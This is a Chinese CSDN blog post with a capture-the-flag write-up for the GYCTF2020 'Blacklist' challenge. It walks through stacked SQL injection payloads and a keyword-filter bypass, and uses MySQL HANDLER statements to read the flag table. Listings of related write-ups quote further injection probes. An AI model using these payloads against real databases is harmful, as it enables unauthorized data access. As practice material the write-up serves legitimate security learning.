[GYCTF2020]Blacklist

已于 2022-05-14 15:29:53 修改
阅读量3.9k 收藏 10
点赞数 5
分类专栏: 题目wp 文章标签: SQL注入 堆叠注入 HANDLER语句 数据库安全 漏洞利用
于 2022-04-19 14:23:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62092622/article/details/124272307
版权

刚开始是这样

既然有个1那就先输入1查询一下吧

返回了一个数组

再加一个单引号,出现报错,说明存在SQL注入

看这个题第一想法就是堆叠注入

为了防止输入1时的干涉,我们输入0(单纯输入0是不会出现任何回应的)

0';show databases;#

然后得到数据库的名字

 然后查询表格

0';show tables;#

FlagHere提示的已经很明显,我们来查询这个表格列名

0';show columns from `FlagHere`;#

本来是直接查询flag就可以了

0';select flag from `FlagHere`;#

但是此时提示不能出现以下关键词

 我们知道/**/可以绕过检查,所以修改payload

0';sel/**/ect flag from `FlagHere`;#

但是竟然什么都没有

然后查询wp发现还有一种操作

HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭

这是一个例子

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

 更多可参考MySQL :: MySQL 8.0 Reference Manual :: 13.2.4 HANDLER Statement

所以按照这个重新构造payload

0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#

得到flag

感觉其他两个题和这个差不多,就把链接放下面了

[SUCTF 2019]EasySQL_-眼里有星河-的博客-CSDN博客

[强网杯 2019]随便注_-眼里有星河-的博客-CSDN博客

-眼里有星河-
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
android_system_blacklist_android_msm8610_
10-03
在Android系统中,"android_system_blacklist_android_msm8610_"可能指的是针对特定硬件平台MSM8610的黑名单配置或者安全更新。MSM8610是高通公司生产的一款移动处理器,主要面向中低端智能手机和平板电脑市场。这个...
[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1
bazzza的博客
12-23 303
blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入,接着使用order by判断字段,发现字段数为2,但在接一步的注入中,出现提示,遇到阻拦。 这个地方使用正则过滤了一些关键字,在尝试绕过的时候也失败了,但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名,然后再进行堆叠注入,(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract
[GYCTF2020]Blacklist(堆叠注入)
记录学习,一起进步
01-19 2010
[GYCTF2020]Blacklist(堆叠注入)
[GYCTF2020]Blacklist1-BUUCTF-详解
chinese_cabbage0的博客
02-05 1801
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 694
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
Quick-Blacklist
06-15
快速黑名单 一个轻量级实用程序,用于将玩家和库存中的项目列入黑名单。
cpf_blacklist
02-08
项目名为"cpf_blacklist-master"暗示这是一个主分支或主要版本,可能包含源代码、测试文件、文档和其他资源。 以下是围绕这个主题可能涉及的一些详细知识点: 1. **字符串操作**:在Python中,CPF号码通常以特定...
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2648
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
练习8 Web [GYCTF2020]Blacklist
最新发布
离暑假还有41天的博客
03-17 1209
这道题其实不是堆叠注入,但是我在联合查询无效后,试了一下堆叠,最后一步发现被过滤的sql语句太多了,完全没法。查阅其他wp的过程,是用的handler语句,只能用于MySQL中,是类似于select的语句,详细内容我记录在我的wp中
buuctf[GYCTF2020]Blacklist
qq_75005708的博客
04-25 173
如果使用别名打开表,使用其他 HANDLER 语句对打开的表的进一步引用必须使用别名,而不是表名。如果不使用别名,但使用由数据库名称限定的表名打开表,则进一步的引用必须使用不限定的表名。例如,使用 mydb.mytable 打开的表,进一步引用必须使用 mytable。和输入1的时候是一样的,看了wp之后发现其他的方法,运用HANDLER 语句。open是打开,read是开始读取的意思,close是结束的意思。是有一个1,我们查询之后会发现出现以上页面,我们再试一下1'然后我们就可以拿到我们的答案了。
[GYCTF2020]Blacklist堆叠注入
qq_43801002的博客
04-27 3357
[GYCTF2020]Blacklist 1';show columns from `FlagHere`; %23 查看列 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭...
[GYCTF2020]Blacklist1
whale_waves的博客
11-07 109
其实这一题我看到的第一反应是基于布尔的盲注 原因: 没有禁用ascii substr 之类的, 并且输入1和0时输入1会有回显0不会 这里将预编译注入、联合注入、报错注入、都过滤的干净 通过它给出的黑名单考虑可用的命令 可尝试的 堆叠注入例如show database和show tables handler命令 基于布尔的盲注(通过1^0^1,真假真为假,1^1^1,真真真为真,来做手段) !!这里后面会排除掉,应为后面才想起来select被禁了,但是查询需要用
Android平台通信Blacklist服务设计及实战开发
本篇论文深入探讨了在Android平台下通信Blacklist服务的设计与实现。作者徐鹏,信息工程学院通信工程专业,学号20084882,在导师马强讲师和乌日娜讲师的指导下完成。随着移动设备技术的快速发展,智能手机已超越传统...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值